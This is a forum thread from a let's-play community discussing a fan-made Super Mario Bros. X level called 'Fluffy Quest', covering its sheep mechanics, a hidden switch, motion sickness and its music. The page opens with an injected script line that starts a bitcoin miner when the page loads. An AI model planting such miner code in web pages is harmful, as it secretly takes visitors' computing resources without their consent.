<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectsmw central

ASMBXT; Journey's end

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Slit08

Re: ASMBXT; Postgame, raocow becomes a RaoMAN!

Postby Slit08 » 6 years ago

Okay, okay, sorry for everything wrong I did. -.- Jesus....
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

alex2
Banned

Postby alex2 » 6 years ago

I'm an asshole for the sake of being an asshole. In reality, I give zero fucks about his level.

I can't not be an asshole, though. Anything inside of A2MT is serious and outside of it is totally unpredictable. I'm not going to apologize.

Good day sir.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

cheez8
Food Nut

Postby cheez8 » 6 years ago

Man, I don't know what the deal is with y'all still being grumpy. When I played through Fluffy Quest I had fun. Granted, I found the blue switch on my first try, but I still can't even think of any way I'd suggest to improve the level other than having the blue blocks just be solid in the first place. Nothing's really bad about the level otherwise.
alex2 wrote:I'm an asshole for the sake of being an asshole. In reality, I give zero fucks about his level.

I can't not be an asshole, though. Anything inside of A2MT is serious and outside of it is totally unpredictable. I'm not going to apologize.

Good day sir.
This actually makes me feel a little better somehow!
I don't really get it but okay

SAJewers
hi

Postby SAJewers » 6 years ago

Pholtos wrote:So after 10 minutes into the video, I felt physically sick. Good times!
This is why that warning was there. Hope you feel better (and raocow, but the level didn't make him sick).
ImageImageImageImageImage
ImageImageImageImage

S.N.N.

Postby S.N.N. » 6 years ago

As opposed to yesterday, I actually believe today's level WAS fundamentally cool. If certain parts of it were polished up and made to be less messy (eg. the area with the sheep spam underneath the blue blocks), I think it would be an okay level.

Also, I should probably note that when part of a level seems hilariously random, it generally means the design is lackluster. This seemed to be the case with the vertical castle portion - it looks like the platforms and cannons were placed everywhere with no rhyme or reason and it was more or less a matter of luck trying to dodge everything. I've noticed this a lot throughout the game, actually - people tend to just throw shit everywhere and call it "difficulty", whereas only a few people have even tried to come up with legit hard and creative setups.

(What was the track? It sounded like something out of a newer Touhou game.)
alex2 wrote:more words
ban alex

Validon98
Goofy Night Sparrow
Pronouns: he/she/they

Postby Validon98 » 6 years ago

I haven't watched the level yet, but I know from the files that the track is Mary Shephard's theme from Touhou Jaiseishou (did I spell that right?): The Last Comer. I'll edit this post with my opinion of Fluffy Quest after I actually watch the video later.
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV: Shadowbringers (Shadows brought, time for postgame)
Final Fantasy V: Four Job Fiesta (Pure Chaos, no restrictions, Interdimensional Rift, let's do this)
Bloodstained: Ritual of the Night (Hard mode is in fact hard)

Strawberry Bose Partial Translations and Patches!

QuietProtag
also known as luigiman09, rip 2010-2014
First name: Félix
Pronouns: he/him/his

Postby QuietProtag » 6 years ago

With the cheats and all, I found yesterday's level, USS Suboptimal kinda alright. Sure, it's tricky and glitchy, but it can be done... with cheats unfortunately...

I like the gimmick of today's level. Although the blue switch should be located somewhere else...
Also, the level doesn't make me sick at all. Maybe it depends on the person.

S.N.N.

Validon98 wrote:Touhou Jaiseishou (did I spell that right?): The Last Comer.
I searched for a few minutes on YouTube and Google but couldn't find any information on this soundtrack. Does anyone know where I can actually find the full thing (or if the level designer, i.e. Septentrion, could post a link to the specific song here, that would be cool).

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 6 years ago

S.N.N. wrote:
Validon98 wrote:Touhou Jaiseishou (did I spell that right?): The Last Comer.
I searched for a few minutes on YouTube and Google but couldn't find any information on this soundtrack. Does anyone know where I can actually find the full thing (or if the level designer, i.e. Septentrion, could post a link to the specific song here, that would be cool).
Here's the youtube link: http://www.youtube.com/watch?v=jpRHFdR6iYs
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

S.N.N.

Great, thanks a lot.

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 6 years ago

S.N.N. wrote:Great, thanks a lot.
You're welcome.

It's a start for enlightening the mood in this thread.
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

D_Prelude

Postby D_Prelude » 6 years ago

I actually found the tower part of fluffy quest to be a whole lot more interesting than both of the outside jump parts. maybe because the gimmick was toned down a bit and used in a smarter way.
Simple Signature.

Slit08

Postby Slit08 » 6 years ago

S.N.N. wrote:As opposed to yesterday, I actually believe today's level WAS fundamentally cool. If certain parts of it were polished up and made to be less messy (eg. the area with the sheep spam underneath the blue blocks), I think it would be an okay level.

Also, I should probably note that when part of a level seems hilariously random, it generally means the design is lackluster. This seemed to be the case with the vertical castle portion - it looks like the platforms and cannons were placed everywhere with no rhyme or reason and it was more or less a matter of luck trying to dodge everything. I've noticed this a lot throughout the game, actually - people tend to just throw shit everywhere and call it "difficulty", whereas only a few people have even tried to come up with legit hard and creative setups.

(What was the track? It sounded like something out of a newer Touhou game.)
alex2 wrote:more words
ban alex
See? Now that's what I call constructive criticism. :) Yeah Fluffy Quest seemed kind of randomn. It's quite a good idea to put moving thigns in a hard platforming level, however it shouldn't be random. Randomness is a lackluster of good quality and only causes frustration for the wrong reasons and is considered fake difficulty. Moving platforms should be placed wisely as should the direction/ pattern they move. I think the level would have been greatly improved if a limited amount of well placed platforms would have moved with a certain speed and a certain pattern. This way it might make you feel sick and progression depends on luck!
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

AuraLancer
AKA Uncle Aura

Postby AuraLancer » 6 years ago

Oh man, this thread. It's gotten more entertaining than raocow playing the game.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 6 years ago

I had no idea the the blue switch part would be so badly received. While I do still think the switch itself should stay as it is, the bouncing sheep part should be improved in both creativity and shouldn't be as hard with out the switch.

also, I tried responding the music in video form. Here's the theme extended. And you can like embedded videos apparently.

docopoper
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla non pharetra enim, nec maximus odio.
First name: Shane Farrell
Pronouns: they/he

Postby docopoper » 6 years ago

I didn't think the switch was a problem. But I guess that's because a coin triggered it for me.

I think the problem with this level is that it's basically like a more extreme version of ice physics on small platforms. That and it made me feel sick. :P

I have got to admit though, my first impression of this level when I played it was really good.
The first thing I would do with infinite power would be to make myself a cave where I could look at my shadow forever.

Image <- Go team Yeah Doctor Shemp.!
Image <- That's everyone being nice to me. ^^

I made a game called Utter Confusion! Play it! :D
It's a lot of fun and has been incredibly popular at every indie game dev party I've brought it to.

Validon98
Goofy Night Sparrow
Pronouns: he/she/they

Postby Validon98 » 6 years ago

Well, Fluffy Quest... besides having sheep and Mary Shephard's theme for the first half, I don't get how it's a Fluffy Quest? I mean, the second part has no sheep and it has Loose Rain instead... Ah, whatever. I can understand why people would get motion sickness from this level, but I don't think it would be too bad for myself (hopefully). In my opinion, besides invisible switches (I guess it makes the level way easier but that part with the jumping sheep looks pretty hard without it due to the nature of the moving layers), the level had some good parts, maybe? Ah well. I honestly hope that this isn't the extent of your abilities in SMBX, SP, because I think that these two levels are a rather bad way of assessing your abilities considering both were, in some way, shape, or form, hard to play due to the way the engine works. I'd like to see a level by you that doesn't have weird moving layers. ^^;
Also, yeah, for those of you who haven't played The Last Comer, go ahead and look it up! It's actually a pretty good Touhou fangame, at least in my opinion. And of course, the music sounds really nice (Phiased's theme and the stage 4 theme in that game are amazing).
Oh yeah, another thing I just remembered. I assume the nearly-world-ending sheep fairy herself was the cameo you didn't implement because graphical reasons, right SP?
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV: Shadowbringers (Shadows brought, time for postgame)
Final Fantasy V: Four Job Fiesta (Pure Chaos, no restrictions, Interdimensional Rift, let's do this)
Bloodstained: Ritual of the Night (Hard mode is in fact hard)

Strawberry Bose Partial Translations and Patches!

Redbone

Postby Redbone » 6 years ago

Fluffy Quest just needs some polishing and tweaking and it'll be a pretty cool level to play. The main problem spots have been pointed out and they don't seem too hard to fix. As well I'd like to echo SNN's thoughts of enemy placements, the level would benefit really well with more thought put into enemy positioning, and bring out the level mechanic's potential a lot more.
exists on occasion

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 6 years ago

No motion sickness here! Enjoyed the level, but think the first switch should've been visible or better heralded. Chaotic random sheep seem fine to me for postgame, but the rotation might needed to have been a little bit slower. Amusing that the title is "strategyyo" when a bit of raocow-strategy may have been just what the latter half of the sheep run called for. The upward ascent and horizontal area was better than the first half, but kinda lacked any sort of context or focus. The boss... well, I guess Ludwig is kinda fluffy. The rinkas were actually reasonable in the Ludwig fight, even if they did look like they were copy-pasted from USS Unfathomable's end room. Maybe if Ludwig was reskinned to Sheep Man, Marry or a blocky sheep with evil red eyes it would've been thematically better and funnier.

Did the fourth grave always say "...who was killed by an angry mob"? Because after yesterday's nonsense, that's just too damn appropriate :D
BOB is an acronym for BOB is Only BOB etc.

cheez8
Food Nut

Postby cheez8 » 6 years ago

Septentrion Pleiades wrote:I had no idea the the blue switch part would be so badly received.
Yeah, me neither. Even I suddenly wasn't too thrilled about it. I guess it was a consequence of seeing just how hard that room could be without it, because it seems like absolutely everybody but raocow managed to find it, and hit it every time from then on.

And yay, people are starting to be more pleasant!
I don't really get it but okay

Ishntknew

Postby Ishntknew » 6 years ago

Slit08 wrote:What a shame to see what this once awesome, friendly and somewhat non-sequitur community has become.
Wait a minute, when was this ever an accurate description of the Talkhaus?
Slit08 wrote:Many peeps here wouldn't act this way yet a few selected members tend to bash people or being incredibly rude when it comes to using words for criticism: alex or MrDeePay to name the two most prominent.
Also I kinda have to object to this. From what I've seen, MrDeePay is very critical, but he's not a complete asshole about it. He just has high standards, and his critiques generally have some useful stuff in them!

Both of these levels made me mad (Fluffy Quest less so), but I'm not mad at Pleiades. Especially since he's taking the criticism like a reasonable adult and not lashing out at everyone over it. That's the sign of an artist with the capacity for growth, and, even with bad first impressions, I'm interested in seeing any future work.

The good news is, the postgame gets way better from here on out, from what I've played. One of my favorite levels in the game is gonna show up in an episode or two.
I'm a lizard's nightmare

Backloggery:
daypular

SAJewers
hi

Ishntknew wrote:The good news is, the postgame gets way better from here on out, from what I've played. One of my favorite levels in the game is gonna show up in an episode or two.
The next 2 levels are Tewi Eien Tewi and Luna Tower. You must hold those levels in a higher regard than me.
ImageImageImageImage

Ishntknew

Postby Ishntknew » 6 years ago

I waited for the update of Tewi Eien Tewi before attempting it, and it kinda... only took me a few tries. I don't know what was changed, but it wasn't nearly the hellish experience I had been expecting, and to be honest was kinda forgettable.

Luna Tower though I love love love. I'll wait for the video before commenting any further though.
I'm a lizard's nightmare

Backloggery:
daypular

SAJewers
hi

Ishntknew wrote:I waited for the update of Tewi Eien Tewi before attempting it, and it kinda... only took me a few tries. I don't know what was changed, but it wasn't nearly the hellish experience I had been expecting, and to be honest was kinda forgettable.

Luna Tower though I love love love. I'll wait for the video before commenting any further though.
I posted a video of someone attempting to play the original Tewi Eien Tewi, if that helps. It was qute bad in it's original iteration, but this update makes it much better.

Luna Tower meanwhile, I found way too long. Really cool, but went on way too long.
ImageImageImageImage

ano0maly
Discord User

Postby ano0maly » 6 years ago

The sheep part in Fluffy Quest reminds me of the of the wind castle in S Mario, particularly the muncher pit with the bowser statue spinjumping. That pit is raocow decided to take the easier route. That's basically what happened in this level, too. The obstacle is doable, but it''s precise enough that a mechanic throwing off your movements slightly can ruin the attempt. Basically you don't feel like you're in control.

It's a really cool concept, but probably could have used less sheep launchers and more leeway-allowing level.
Image The talkhaus Discord server. Come ask for an invite to join!

Image << Click!

Return to “let's play”